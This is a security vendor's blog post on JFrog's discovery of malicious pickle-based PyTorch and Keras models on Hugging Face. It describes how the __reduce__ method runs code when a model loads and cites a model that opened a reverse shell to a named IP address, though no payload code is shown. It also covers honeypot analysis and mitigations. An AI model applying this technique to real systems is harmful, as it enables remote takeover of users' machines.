Get a demo

Voyager18 (research)

Understanding the Hugging Face backdoor threat

AI collaboration platform Hugging Face could be susceptible to model-based attacks. Here's what we know so far.

Yair Divinsky | February 29, 2024

In the realm of AI collaboration, Hugging Face reigns supreme. But could it be the target of model-based attacks? Recent findings from JFrog suggest a concerning possibility, prompting a closer look at the platform’s security and signaling a new era of caution in AI research. 

Here’s what we learned:

TL;DR

Growing security concerns for AI models have been highlighted with the discovery of malicious functionalities within models on Hugging Face, showcasing the potential for targeted attacks.

Key points:

  • 100 malicious PyTorch and Tensorflow Keras models identified on Hugging Face by JFrog.
  • Malicious payloads in these models could include backdoors for remote code execution.
  • Security challenges encompass data poisoning, model theft, adversarial attacks, privacy issues, and supply chain risks.
  • An example involved a PyTorch model by “baller423” exploiting Python’s pickle module to execute code remotely.
  • JFrog’s response includes advanced scanning technologies, honeypot deployment for threat analysis, and detailed mitigation recommendations for data scientists.
  • Hugging Face has implemented malware, pickle, and secrets scanning, yet vulnerabilities persist, underlining the importance of ongoing security enhancements.

Introduction to AI Model Security

The discussion on AI Machine Language (ML) models security is still not widespread enough, and this blog post aims to broaden the conversation around the topic.  

This area encompasses a wide range of security measures designed to safeguard the integrity, confidentiality, and availability of AI systems. As AI models become increasingly integral to various sectors, including healthcare, finance, and national security, ensuring their security is paramount. The unique challenges and potential solutions in AI model security include: 

Unique Challenges 

Data poisoning: Attackers can manipulate the training data to compromise the model’s performance or cause it to make incorrect predictions. 

Model stealing: Competitors or malicious actors may attempt to replicate a proprietary AI model by querying it with inputs and using the outputs to train a similar model. 

Adversarial attacks: Slight, often imperceptible alterations to input data can lead to incorrect outputs from the AI model, exploiting vulnerabilities in the model’s interpretative logic. 

Privacy leaks: AI models, especially those trained on sensitive or personal data, can inadvertently reveal information about the training data through their outputs. 

Supply chain attacks: Compromises in the supply chain can affect the integrity of AI models by introducing vulnerabilities at any point from development to deployment. 

 

Unveiling the threat: Silent backdoors in ML models

As with other open-source repositories, JFrog has been regularly monitoring and scanning AI models uploaded by users. One of its researchers – David Cohen – has discovered a model whose loading leads to code execution after loading a pickle file. The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a “backdoor”.  

JFrog implemented a sophisticated scanning technology to scrutinize models from PyTorch and Tensorflow Keras available on Hugging Face, identifying a hundred models exhibiting malicious characteristics. 

“It’s crucial to emphasize that when we refer to ‘malicious models,’ we specifically denote those housing real, harmful payloads,” the JFrog report states. 

“This count excludes false positives, ensuring a genuine representation of the distribution of efforts towards producing malicious models for PyTorch and Tensorflow on Hugging Face.” 

Code execution can happen when loading certain types of ML models from an untrusted source. For example, some models use the “pickle” format, which is a common format for serializing Python objects. However, pickle files can also contain arbitrary code that is executed when the file is loaded.

 

Attack mechanism

A notable instance involved a PyTorch model, uploaded by a user called “baller423” and subsequently deleted from HuggingFace, which harbored a payload enabling the creation of a reverse shell to a predetermined host (210.117.212.93). 

hugging face payload

The nefarious payload leveraged the “reduce” method from Python’s pickle module to run arbitrary code when a PyTorch model file was loaded, cleverly bypassing security measures by inserting the malicious code within the serialization process’s trusted framework. 

 

Establishing a HoneyPot for analysis 

To gain additional insights into the actors’ intentions, JFrog established a HoneyPot on an external server, completely isolated from any sensitive networks. By mimicking legitimate systems or services, a HoneyPot can attract various types of attacks, allowing defenders to monitor and analyze attackers’ activities.

Honeypot



 

Analyzing IP WHOIS lookup results

Further investigation into the IP address range belonging to KREOnet suggests potential ties between the authors of these models and researchers or AI practitioners. 

whois

 

Mitigating the risks: Recommendations for data scientists

To mitigate risks associated with malicious models and potential code execution vulnerabilities, data scientists should adopt proactive measures such as source verification, security scans, safe loading methods, updating dependencies, reviewing model code, isolating environments, and educating users.

Hugging Face’s security measures

Hugging Face, a platform for AI collaboration, has implemented several security measures such as malware scanning, pickle scanning, and secrets scanning to prevent these attacks. These features scan every file of the repositories for malicious code, unsafe deserialization, or sensitive information, and alert the users or the moderators accordingly. Despite these measures, recent incidents serve as a stark reminder that the platform is not immune to real threats.

 

Next steps 

Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. 2023 Vulnerability watch reports 
  2. The MITRE ATT&CK framework: Getting started
  3. The true impact of exploitable vulnerabilities for 2024
  4. Multi-cloud security challenges – a best practice guide
  5. How to properly tackle zero-day threats

Get rid of silos;

Start owning exposure risk

Test drive the leader in exposure risk management